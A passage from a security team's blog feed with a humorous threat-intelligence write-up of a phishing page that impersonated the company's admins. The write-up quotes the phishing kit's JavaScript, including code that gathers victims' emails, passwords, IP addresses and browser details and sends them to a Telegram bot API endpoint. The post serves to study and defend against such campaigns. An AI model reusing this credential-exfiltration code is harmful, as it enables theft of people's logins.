contato@registrodewesite[.]shop</code></pre><div><hr></div><h2>References</h2><ul><li><p><a href="https://otx.alienvault.com/pulse/67ab96274e347de2e3a2edaf">AlienVault OTX - Quetzal Team original intelligence pulse</a><br><br></p></li></ul>]]></content:encoded></item><item><title><![CDATA[A Phishing Trip]]></title><description><![CDATA[When a scammer gets baited, lured and tangled]]></description><link>https://quetzal.bitso.com/p/a-phishing-trip</link><guid isPermaLink="false">https://quetzal.bitso.com/p/a-phishing-trip</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Fri, 17 Jan 2025 20:02:59 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!L0UU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5413462-b14e-470f-a4c9-c7ba332b8504_640x480.heic" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!L0UU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5413462-b14e-470f-a4c9-c7ba332b8504_640x480.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!L0UU!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5413462-b14e-470f-a4c9-c7ba332b8504_640x480.heic 424w, https://substackcdn.com/image/fetch/$s_!L0UU!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5413462-b14e-470f-a4c9-c7ba332b8504_640x480.heic 848w, https://substackcdn.com/image/fetch/$s_!L0UU!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5413462-b14e-470f-a4c9-c7ba332b8504_640x480.heic 1272w, https://substackcdn.com/image/fetch/$s_!L0UU!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5413462-b14e-470f-a4c9-c7ba332b8504_640x480.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!L0UU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5413462-b14e-470f-a4c9-c7ba332b8504_640x480.heic" width="458" height="343.5" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d5413462-b14e-470f-a4c9-c7ba332b8504_640x480.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:480,&quot;width&quot;:640,&quot;resizeWidth&quot;:458,&quot;bytes&quot;:74614,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!L0UU!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5413462-b14e-470f-a4c9-c7ba332b8504_640x480.heic 424w, https://substackcdn.com/image/fetch/$s_!L0UU!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5413462-b14e-470f-a4c9-c7ba332b8504_640x480.heic 848w, https://substackcdn.com/image/fetch/$s_!L0UU!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5413462-b14e-470f-a4c9-c7ba332b8504_640x480.heic 1272w, https://substackcdn.com/image/fetch/$s_!L0UU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5413462-b14e-470f-a4c9-c7ba332b8504_640x480.heic 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>2025 has just begun, and scammers aren&#8217;t taking any breaks. Earlier today, a new phishing campaign landed in our support ticketing inbox. At first glance, we assumed it was a continuation of the<a href="https://quetzal.bitso.com/p/stealing-christmas"> Zhong Stealer</a> campaign&#8212;but this one was different.</p><p>&#8220;<strong>Account suspension notification</strong>&#8221;, read the ticket, sent by someone impersonating one of our admins. Despite the absurd claim&#8212;and the equally absurd method of delivering it&#8212;we immediately began investigating.</p><div><hr></div><h2>The Phisher Muppet</h2><p>Our scammer used a website hosted on Google Appspot that posed as a login form. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!oqj3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9634a9bc-66c2-438b-8153-c7628160ab5c_1062x1116.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!oqj3!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9634a9bc-66c2-438b-8153-c7628160ab5c_1062x1116.png 424w, https://substackcdn.com/image/fetch/$s_!oqj3!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9634a9bc-66c2-438b-8153-c7628160ab5c_1062x1116.png 848w, https://substackcdn.com/image/fetch/$s_!oqj3!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9634a9bc-66c2-438b-8153-c7628160ab5c_1062x1116.png 1272w, https://substackcdn.com/image/fetch/$s_!oqj3!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9634a9bc-66c2-438b-8153-c7628160ab5c_1062x1116.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!oqj3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9634a9bc-66c2-438b-8153-c7628160ab5c_1062x1116.png" width="448" height="470.77966101694915" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9634a9bc-66c2-438b-8153-c7628160ab5c_1062x1116.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1116,&quot;width&quot;:1062,&quot;resizeWidth&quot;:448,&quot;bytes&quot;:59512,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!oqj3!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9634a9bc-66c2-438b-8153-c7628160ab5c_1062x1116.png 424w, https://substackcdn.com/image/fetch/$s_!oqj3!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9634a9bc-66c2-438b-8153-c7628160ab5c_1062x1116.png 848w, https://substackcdn.com/image/fetch/$s_!oqj3!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9634a9bc-66c2-438b-8153-c7628160ab5c_1062x1116.png 1272w, https://substackcdn.com/image/fetch/$s_!oqj3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9634a9bc-66c2-438b-8153-c7628160ab5c_1062x1116.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>A quick look at the URL revealed that we could manipulate it to modify the form and tailor it for other potential victims. Parsing arguments from an URL? That&#8217;s a <em>muppet</em> way to do things. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!pXHA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa8a7082b-915f-49b1-84eb-4eebcd135b71_1048x1144.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!pXHA!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa8a7082b-915f-49b1-84eb-4eebcd135b71_1048x1144.heic 424w, https://substackcdn.com/image/fetch/$s_!pXHA!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa8a7082b-915f-49b1-84eb-4eebcd135b71_1048x1144.heic 848w, https://substackcdn.com/image/fetch/$s_!pXHA!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa8a7082b-915f-49b1-84eb-4eebcd135b71_1048x1144.heic 1272w, https://substackcdn.com/image/fetch/$s_!pXHA!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa8a7082b-915f-49b1-84eb-4eebcd135b71_1048x1144.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!pXHA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa8a7082b-915f-49b1-84eb-4eebcd135b71_1048x1144.heic" width="399" height="435.5496183206107" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a8a7082b-915f-49b1-84eb-4eebcd135b71_1048x1144.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1144,&quot;width&quot;:1048,&quot;resizeWidth&quot;:399,&quot;bytes&quot;:31397,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!pXHA!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa8a7082b-915f-49b1-84eb-4eebcd135b71_1048x1144.heic 424w, https://substackcdn.com/image/fetch/$s_!pXHA!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa8a7082b-915f-49b1-84eb-4eebcd135b71_1048x1144.heic 848w, https://substackcdn.com/image/fetch/$s_!pXHA!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa8a7082b-915f-49b1-84eb-4eebcd135b71_1048x1144.heic 1272w, https://substackcdn.com/image/fetch/$s_!pXHA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa8a7082b-915f-49b1-84eb-4eebcd135b71_1048x1144.heic 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>This behaviour is led by this small code snippet, which extracts the domain (everything after the &#8220;@&#8221; symbol) and displays it as the company the form supposedly belongs to:</p><pre><code>var ind = my_ai. indexOf ("@");
var m_slic = my_ai. substr((ind + 1)) ;
var c = m_slic.substr(0, m_slic.index0f('.'));
var fnll = c. toLowerCase();
var fllu = c. toUpperCase();
var browser = GetBrowserandLanguage () [0];</code></pre><p>Resorting to client-side code like JavaScript to reflect content on a phishing page? That sounds like a muppet move. This is a clear indicator of inexperience, so let&#8217;s take a closer look at the rest of the code&#8212;there&#8217;s a good chance we&#8217;ll uncover more clues.</p><pre><code>var f = "bmV4dC5waHA=";
$( '#sub_btn'). click(function (event) {
  $( '#errror').hide();
  [...]</code></pre><p>&#8220;<em>next.php&#8221;</em> encoded in Base64. Let&#8217;s see what&#8217;s next:</p><pre><code>var message = "-+ General Webmail ReZulT +=\n";
message += "Email: " + ai + "\n"; 
message += "Password: " + pr + "\n";
message += "Browser : " + GetBrowserandLanguage () [0] + "\n";
message += "Language: " + GetBrowserandLanguage () [1] + "\n"; 
message += "MX Record: " + await getMXRecord (domain) + "\n"; 
message += "IP Address : " + ip + "\n"; message += "Date: " + date + "\n";
message += "&#8212;-+ General Webmail ReZulT +---\n";
var token = "73<strong>[REDACTED]</strong>rI";
var chatId = "1<strong>[REDACTED]</strong>6";
dataType: 'JSON', rl: 'https://api.telegram.org/bot${token}/sendMessage,
type: 'POST',
data: {
[...]</code></pre><p>So, our <em>Threat Stuntman</em> (he clearly isn&#8217;t quite an actor) left a plaintext <strong>Telegram Bot Token</strong> and a <strong>Telegram</strong> <strong>Chat ID</strong> in the code. </p><p>Base64 encoded strings, client-side tokens, &#8220;<em>ReZulT</em>&#8221; <a href="https://en.wikipedia.org/wiki/Leet">l33t</a> speaking, URL based constructions&#8230; </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2PWE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2de406d7-4ca0-4e49-b480-15de76b74bff_256x256.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2PWE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2de406d7-4ca0-4e49-b480-15de76b74bff_256x256.png 424w, https://substackcdn.com/image/fetch/$s_!2PWE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2de406d7-4ca0-4e49-b480-15de76b74bff_256x256.png 848w, https://substackcdn.com/image/fetch/$s_!2PWE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2de406d7-4ca0-4e49-b480-15de76b74bff_256x256.png 1272w, https://substackcdn.com/image/fetch/$s_!2PWE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2de406d7-4ca0-4e49-b480-15de76b74bff_256x256.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2PWE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2de406d7-4ca0-4e49-b480-15de76b74bff_256x256.png" width="256" height="256" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2de406d7-4ca0-4e49-b480-15de76b74bff_256x256.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:256,&quot;width&quot;:256,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:21399,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!2PWE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2de406d7-4ca0-4e49-b480-15de76b74bff_256x256.png 424w, https://substackcdn.com/image/fetch/$s_!2PWE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2de406d7-4ca0-4e49-b480-15de76b74bff_256x256.png 848w, https://substackcdn.com/image/fetch/$s_!2PWE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2de406d7-4ca0-4e49-b480-15de76b74bff_256x256.png 1272w, https://substackcdn.com/image/fetch/$s_!2PWE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2de406d7-4ca0-4e49-b480-15de76b74bff_256x256.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">So engineering, much wow</figcaption></figure></div><p>Let&#8217;s see what happens in the backstage.</p><div><hr></div><h2>Muppet Pest Control (A subsidiary of Threat Punchers INC)</h2><p>At the backstage, the <em>Muppet</em> will fetch our IP address information from <em>ipinfo.io</em>, classic move.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!qxLE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1c442b0b-0ae2-4469-a1da-11ff1d4f9db7_1824x2078.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!qxLE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1c442b0b-0ae2-4469-a1da-11ff1d4f9db7_1824x2078.png 424w, https://substackcdn.com/image/fetch/$s_!qxLE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1c442b0b-0ae2-4469-a1da-11ff1d4f9db7_1824x2078.png 848w, https://substackcdn.com/image/fetch/$s_!qxLE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1c442b0b-0ae2-4469-a1da-11ff1d4f9db7_1824x2078.png 1272w, https://substackcdn.com/image/fetch/$s_!qxLE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1c442b0b-0ae2-4469-a1da-11ff1d4f9db7_1824x2078.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!qxLE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1c442b0b-0ae2-4469-a1da-11ff1d4f9db7_1824x2078.png" width="446" height="508.1826923076923" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1c442b0b-0ae2-4469-a1da-11ff1d4f9db7_1824x2078.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1659,&quot;width&quot;:1456,&quot;resizeWidth&quot;:446,&quot;bytes&quot;:837934,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!qxLE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1c442b0b-0ae2-4469-a1da-11ff1d4f9db7_1824x2078.png 424w, https://substackcdn.com/image/fetch/$s_!qxLE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1c442b0b-0ae2-4469-a1da-11ff1d4f9db7_1824x2078.png 848w, https://substackcdn.com/image/fetch/$s_!qxLE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1c442b0b-0ae2-4469-a1da-11ff1d4f9db7_1824x2078.png 1272w, https://substackcdn.com/image/fetch/$s_!qxLE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1c442b0b-0ae2-4469-a1da-11ff1d4f9db7_1824x2078.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Then, will try to resolve the MX DNS record using Google&#8217;s services.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!GER-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e8719c-3df5-4bb4-942f-682b1fe757b6_1824x2078.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 